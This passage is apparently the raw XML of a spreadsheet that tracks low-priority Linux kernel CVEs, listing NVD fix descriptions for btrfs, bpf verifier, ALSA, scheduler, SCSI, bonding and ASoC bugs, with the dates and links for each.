   btrfs_ioctl+0x2839/0x2d30 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   __x64_sys_ioctl+0x416/0x9a0
   do_syscall_64+0xe1/0x790
   entry_SYSCALL_64_after_hwframe+0x4b/0x53
   &lt;/TASK&gt;
  ---[ end trace 0000000000000000 ]---
  BTRFS info (device dm-2): leaf 4593991680 gen 233 total ptrs 175 free space 5953 owner 2
  BTRFS info (device dm-2): refs 3 lock_owner 2173 current 2173
  	item 0 key (166772736 METADATA_ITEM 1) itemoff 16250 itemsize 33
  		extent refs 1 gen 222 flags 2
  		ref#0: tree block backref root 266
         [ Skip the tree dump ]
  	item 174 key (263225344 METADATA_ITEM 0) itemoff 10328 itemsize 33
  		extent refs 1 gen 162 flags 258
  		ref#0: tree block backref root 267
  BTRFS error (device dm-2): extent item not found for insert, bytenr 179847168 num_bytes 16384 parent 4594335744 root_objectid 273 owner 0 offset 0
  BTRFS error (device dm-2): failed to run delayed ref for logical 179847168 num_bytes 16384 type 182 action 1 ref_mod 1: -117
[CAUSE]
The above error is showing that there is a tree reference to a metadata
extent that is no longer there.
With "ref_verify" mount option (requires CONFIG_BTRFS_DEBUG), there is
some extra debug output:
  BTRFS error (device dm-2): dumping block entry [180961280 16384], num_refs 0, metadata 1, from disk 0
  BTRFS error (device dm-2):   root entry 256, num_refs 18446744073709551615
  BTRFS error (device dm-2):   root entry 273, num_refs 18446744073709551615
  BTRFS error (device dm-2):   Ref action 3, root 273, ref_root 273, parent 0, owner 0, offset 0, num_refs 1
     btrfs_force_cow_block+0x129/0x7d0 [btrfs]
     btrfs_cow_block+0x10a/0x250 [btrfs]
     btrfs_search_slot+0x5eb/0xf40 [btrfs]
     btrfs_insert_empty_items+0x3a/0x70 [btrfs]
     insert_with_overflow+0x53/0x130 [btrfs]
     btrfs_insert_dir_item+0x125/0x290 [btrfs]
     btrfs_add_link+0xaa/0x410 [btrfs]
     btrfs_rename+0x5ea/0xcd0 [btrfs]
     btrfs_rename2+0x28/0x60 [btrfs]
     vfs_rename+0x5b2/0xe10
     filename_renameat2+0x244/0x430
     __x64_sys_rename+0x48/0x70
     do_syscall_64+0xe1/0x790
     entry_SYSCALL_64_after_hwframe+0x4b/0x53
---truncated---</t>
        </is>
      </c>
      <c r="T704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98080</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98081</t>
        </is>
      </c>
      <c r="D705" s="5" t="inlineStr"/>
      <c r="E705" s="5" t="inlineStr"/>
      <c r="F705" s="5" t="inlineStr"/>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr"/>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q705" s="5" t="inlineStr"/>
      <c r="R705" s="5" t="inlineStr"/>
      <c r="S705" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zoned: finish active block group cleanup if call_zone_finish() fails
do_zone_finish() clears BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE before finishing
the zones. If call_zone_finish() then fails it returned early, leaving the
now inactive block group on fs_info-&gt;zone_active_bgs, leaking its
reference, the BTRFS_FS_NEED_ZONE_FINISH waiters are never woken, and as
its alloc_offset equals the zone capacity btrfs_zone_finish_one_bg() keeps
selecting it, spinning btrfs_zoned_activate_one_bg().
Fall through to the cleanup on failure too and return the error, but keep
the block group read-only as its zones are left inconsistent.</t>
        </is>
      </c>
      <c r="T705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98081</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98082</t>
        </is>
      </c>
      <c r="D706" s="5" t="inlineStr"/>
      <c r="E706" s="5" t="inlineStr"/>
      <c r="F706" s="5" t="inlineStr"/>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q706" s="5" t="inlineStr"/>
      <c r="R706" s="5" t="inlineStr"/>
      <c r="S706" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix the possible bioc_list memory leak during error
There are two possible ways to leak bioc memory on
btrfs_ordered_extent::bioc_list:
- An error occurred for btrfs_insert_one_raid_extent()
  Then the function btrfs_insert_raid_extent() immediately return
  without freeing any bioc in the bioc_list.
- An ordered extent hit an IO error
  In that case the ordered extent will have BTRFS_ORDERED_IOERR set, and
  skip the call on btrfs_insert_raid_extent() completely.
Fix the problem by:
- Introduce a new helper, btrfs_cleanup_ordered_bioc_list()
  Which will remove all bioc from the bioc_list, and release the bioc.
- Call the above helper for btrfs_insert_raid_extent()
  So that the cleanup helper is always called no matter what.
- Call the above helper for btrfs_finish_one_ordered()
  This is called just before the final release on the ordered extent.
This was reported by Sashiko when reviewing another patch.</t>
        </is>
      </c>
      <c r="T706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98082</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98084</t>
        </is>
      </c>
      <c r="D707" s="5" t="inlineStr"/>
      <c r="E707" s="5" t="inlineStr"/>
      <c r="F707" s="5" t="inlineStr"/>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr">
        <is>
          <t>checkpoint</t>
        </is>
      </c>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q707" s="5" t="inlineStr"/>
      <c r="R707" s="5" t="inlineStr"/>
      <c r="S707" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: backtracking shouldn't clear outer frame R1-R5 for callbacks
When processing calls to bpf_loop() verifier marks R1 (and R4) as
precise. R1 tracks loop iterations number and because of the
'callback_depth &lt; R1' mechanics in check_helper_call() must be marked
precise. However, precision propagation for R1 was broken,
when bpf_loop() call was verified on a second iteration.
Consider the following verification trace:
- main: bpf_loop(nr_loops, callback ...)
- callback: BPF_EXIT
- main: bpf_loop(nr_loops, callback ...)
- ...
While the first visit of the call to bpf_loop() propagated R1
precision as expected, the second call to mark_chain_precision() in
the check_helper_call() set R1, but it was immediately reset when
backtrack_insn() processed preceding BPF_EXIT in the loop deleted in
this patch.
Because of that, the second visit of the call to bpf_loop() injected
checkpoint with R1 not marked as precise. Which could trick the
verifier into accepting unsafe programs. See the next patch for an
example of such program.
Commit is structured in a way to minimize conflicts when
'bpf' would be eventually merged with 'bpf-next'.</t>
        </is>
      </c>
      <c r="T707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98084</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98085</t>
        </is>
      </c>
      <c r="D708" s="5" t="inlineStr"/>
      <c r="E708" s="5" t="inlineStr"/>
      <c r="F708" s="5" t="inlineStr"/>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q708" s="5" t="inlineStr"/>
      <c r="R708" s="5" t="inlineStr"/>
      <c r="S708" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: backtrack_insn(): Handle ld_{abs,ind} subprog exit edge
Nicholas Carlini reported a bug in precision backtracking mechanism
for BPF_LD | BPF_{IND,ABS} instructions. These instructions are
modelled as two branches:
- fallthrough;
- implicit exit from current subprogram.
The implicit exit case was not handled by the backtrack_insn()
function. When backtracking such a path backtrack_insn() did not
call bt_subprog_enter(), which meant that backtracking continued
manipulating precision marks in a caller frame, while looking at
instructions in a callee frame.
This lead to segmentation faults during verification (see the
selftest), or unsound state pruning.</t>
        </is>
      </c>
      <c r="T708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98085</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98086</t>
        </is>
      </c>
      <c r="D709" s="5" t="inlineStr"/>
      <c r="E709" s="5" t="inlineStr"/>
      <c r="F709" s="5" t="inlineStr"/>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q709" s="5" t="inlineStr"/>
      <c r="R709" s="5" t="inlineStr"/>
      <c r="S709" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: ump: do not touch legacy_rmidi before it exists
snd_ump_parse_endpoint() sets ump-&gt;parsed on every exit, including
error, before the caller attaches the legacy rawmidi device.
ump_handle_ep_name_msg() then treats parsed as "legacy_rmidi is live"
and calls ump_legacy_set_rawmidi_name(), which snprintf()s into
ump-&gt;legacy_rmidi-&gt;name. If a UMP packet arrives in that window
(IRQ path from snd_ump_receive), legacy_rmidi is still NULL
(KASAN null-ptr-deref in snprintf).
Guard the legacy helpers. parsed only means endpoint info was
parsed, not that legacy_rmidi exists.</t>
        </is>
      </c>
      <c r="T709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98086</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98087</t>
        </is>
      </c>
      <c r="D710" s="5" t="inlineStr"/>
      <c r="E710" s="5" t="inlineStr"/>
      <c r="F710" s="5" t="inlineStr"/>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q710" s="5" t="inlineStr"/>
      <c r="R710" s="5" t="inlineStr"/>
      <c r="S710" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/rt,dl: Skip migrate-disabled tasks when picking a push candidate
A migrate_disable()'d RT task cannot be moved to another CPU, but the
scheduler still keeps such a task on that CPU's pushable list
(rq-&gt;rt.pushable_tasks) and still marks the runqueue RT-overloaded
(rq-&gt;rt.overloaded = 1). So the RT balancer keeps treating this CPU as
having a task to move away, and keeps trying to move the task, but the
push can never succeed. When the head is pinned, push_rt_task() does not
give up either. It falls back to pushing rq-&gt;curr instead, using the
per-CPU stopper, as added by commit a7c81556ec4d ("sched: Fix
migrate_disable() vs rt/dl balancing").
The CPU spends tens of milliseconds in this retry loop. The core is
isolated for real-time work, but during the loop nearly half of its time
is consumed by pushes that cannot succeed.
An ftrace capture of the affected CPU, with sched_switch enabled and
commit 94894c9c477e ("sched/rt: Skip currently executing CPU in
rto_next_cpu()") applied, shows where the CPU time went. Two SCHED_FIFO
tasks at equal priority shared the CPU, taskA migrate_disable()'d and
queued, taskB as rq-&gt;curr. In one 89 ms window, taskB got only 52 ms of
CPU. The other 37 ms went to the stopper thread.
The scheduler kept trying to push taskA, the pinned head of the pushable
list, fell back to pushing taskB instead, and woke the stopper 5204
times. Every one of those pushes failed and no task was moved. taskA
stayed runnable and queued the whole time, and never ran.
Pushing taskB fails on a re-check. find_lock_lowest_rq() drops the rq
lock to take the target rq lock, then checks again with
"task != pick_next_pushable_task(rq)".
The task being pushed is taskB, but the pick returns taskA, the head of
the pushable list. taskB is rq-&gt;curr, and set_next_task_rt() removes the
running task from that list, so taskB can never be the head. The check
expects a candidate taken from the pushable list, but the fallback
pushes rq-&gt;curr, which is never on that list. So the check fails every
time.
   .--&gt; push-IPI arrives
   |          |
   |          v
   |     pushable head = taskA   -&gt;  pinned, cannot be pushed
   |          |
   |          v
   |     so push taskB instead   -&gt;  wake migration/N, a stop-class
   |          |                      thread, so it preempts taskB
   |          v
   |     re-check compares taskB against the pushable head,
   |     which is still taskA                        -&gt;  give up
   |          |
   |          v
   |     nothing moved, taskA still queued, rq still overloaded
   |          |
   '----------'
         repeats every ~17 us, 5204 times, for 89 ms
   The loop cannot stop itself. Every round leaves the runqueue
   exactly as it was, so the next push-IPI does the same thing. In
   the capture it ended only when taskB went to sleep on its own.
   taskA was then picked locally and left the pushable list.
   CPU time per task in the window, from sched_switch:
     taskB         51.95 ms   real work
     migration/N   37.18 ms   nothing moved
     taskA          0.00 ms   queued the whole time, never picked
     idle           0.01 ms
   Counts over the same window:
      7667  push-IPIs handled on this CPU
     17481  pick_next_pushable_task() returned taskA, still pinned
      5204  find_lock_lowest_rq() gave up on the re-check
         1  push that actually completed
         0  migrations of taskA
   The CPU times and the window length come from the standard
   sched_switch tracepoint. The counts needed tracepoints added inside
   the RT balancer for this investigation.
The self-IPI path is closed by the rto_next_cpu() fix above, and that
part works. But the runqueue is still marked overloaded, because the
pinned task is still advertised as pushable. Other CPUs now send the
push-IPIs during their own RT balancing, and the same loop runs again.
Closing the self-IPI path did not stop a pinn
---truncated---</t>
        </is>
      </c>
      <c r="T710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98087</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98088</t>
        </is>
      </c>
      <c r="D711" s="5" t="inlineStr"/>
      <c r="E711" s="5" t="inlineStr"/>
      <c r="F711" s="5" t="inlineStr"/>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="inlineStr"/>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q711" s="5" t="inlineStr"/>
      <c r="R711" s="5" t="inlineStr"/>
      <c r="S711" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: mpt3sas: Avoid out-of-bounds cpumask_of_node() call in _base_assign_reply_queues()
dev_to_node() can return NUMA_NO_NODE (-1) on systems without NUMA
topology information for the PCI device, such as single-socket boards
that don't expose device-to-node affinity. Passing -1 directly into
cpumask_of_node() indexes node_to_cpumask_map[-1], an out-of-bounds
array read caught by UBSAN:
  UBSAN: array-index-out-of-bounds in arch/x86/include/asm/topology.h:72:28
  index -1 is out of range for type 'cpumask *[1024]'
Fall back to cpu_online_mask when no NUMA node is available, rather than
assuming dev_to_node() always returns a valid node index.</t>
        </is>
      </c>
      <c r="T711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98088</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98089</t>
        </is>
      </c>
      <c r="D712" s="5" t="inlineStr"/>
      <c r="E712" s="5" t="inlineStr"/>
      <c r="F712" s="5" t="inlineStr"/>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="inlineStr"/>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q712" s="5" t="inlineStr"/>
      <c r="R712" s="5" t="inlineStr"/>
      <c r="S712" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bonding: alb: fix uninitialized transport header access in alb_determine_nd()
alb_determine_nd() uses icmp6_hdr(skb) to inspect ICMPv6 headers.
However, in xmit paths (e.g. packets sent via AF_PACKET / raw sockets
or forwarded packets), skb-&gt;transport_header is not guaranteed to be
initialized. While pskb_network_may_pull() ensures the packet data is
linear starting from the network header, it does not set or adjust the
transport header offset.
Dereferencing icmp6_hdr(skb) can therefore access out-of-bounds memory.
Fetch the icmp6hdr directly after ipv6hdr following pskb_network_may_pull(),
and reload ipv6hdr in case pskb_may_pull() reallocated skb-&gt;head.
Also remove the unused bond argument from alb_determine_nd().</t>
        </is>
      </c>
      <c r="T712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98089</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98090</t>
        </is>
      </c>
      <c r="D713" s="5" t="inlineStr"/>
      <c r="E713" s="5" t="inlineStr"/>
      <c r="F713" s="5" t="inlineStr"/>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="inlineStr"/>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q713" s="5" t="inlineStr"/>
      <c r="R713" s="5" t="inlineStr"/>
      <c r="S713" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: restore active device pointers after failed sprout
btrfs_init_new_device() switches latest_dev and possibly s_bdev from the
seed device to the new sprout device before creating the first writable
chunks.
If chunk creation or the subsequent sprout setup fails, the error path
releases the new device without switching those pointers back.
btrfs_show_devname() can then dereference the freed latest_dev and crash.
Restore the active device pointers to the latest seed device before
removing and releasing the failed sprout device.</t>
        </is>
      </c>
      <c r="T713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98090</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98091</t>
        </is>
      </c>
      <c r="D714" s="5" t="inlineStr"/>
      <c r="E714" s="5" t="inlineStr"/>
      <c r="F714" s="5" t="inlineStr"/>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="inlineStr"/>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q714" s="5" t="inlineStr"/>
      <c r="R714" s="5" t="inlineStr"/>
      <c r="S714" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: detach failed sprout device from transaction update list
When creating the first metadata chunk for a sprout filesystem,
create_chunk() adds the new device to the transaction dev_update_list
through device-&gt;post_commit_list.
If the subsequent system chunk creation fails, btrfs_init_new_device()
aborts the transaction and releases the device while post_commit_list is
still linked. This triggers a warning in btrfs_free_device() and leaves
the transaction list referencing freed memory.
Detach the device while holding chunk_mutex before releasing it.</t>
        </is>
      </c>
      <c r="T714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98091</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98092</t>
        </is>
      </c>
      <c r="D715" s="5" t="inlineStr"/>
      <c r="E715" s="5" t="inlineStr"/>
      <c r="F715" s="5" t="inlineStr"/>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="inlineStr"/>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q715" s="5" t="inlineStr"/>
      <c r="R715" s="5" t="inlineStr"/>
      <c r="S715" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: amd: yc: fix memory leak in acp6x_pdm_dma_close()
acp6x_pdm_dma_close() does not free the runtime-&gt;private_data buffer
allocated in acp6x_pdm_dma_open(). Add the missing kfree.</t>
        </is>
      </c>
      <c r="T715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98092</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98093</t>
        </is>
      </c>
      <c r="D716" s="5" t="inlineStr"/>
      <c r="E716" s="5" t="inlineStr"/>
      <c r="F716" s="5" t="inlineStr"/>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q716" s="5" t="inlineStr"/>
      <c r="R716" s="5" t="inlineStr"/>
      <c r="S716" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: fsl_micfil: balance mclk enable/disable
hw_params() enables mclk unconditionally and hw_free() disables it
unconditionally, but the PCM core does not guarantee 1:1 pairing:
hw_free() can run without hw_params(), and hw_params() can be called
multiple times from the SETUP state. This triggers an "already
disabled" WARN() in the first case and leaks an enable reference in
the second, leaving the clock ungateable.
Guard both sides with the existing mclk_flag, as fsl_sai.c does with
mclk_streams.</t>
        </is>
      </c>
      <c r="T716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98093</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98094</t>
        </is>
      </c>
      <c r="D717" s="5" t="inlineStr"/>
      <c r="E717" s="5" t="inlineStr"/>
      <c r="F717" s="5" t="inlineStr"/>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q717" s="5" t="inlineStr"/>
      <c r="R717" s="5" t="inlineStr"/>
      <c r="S717" s="5" t="inlineStr">
        <is>
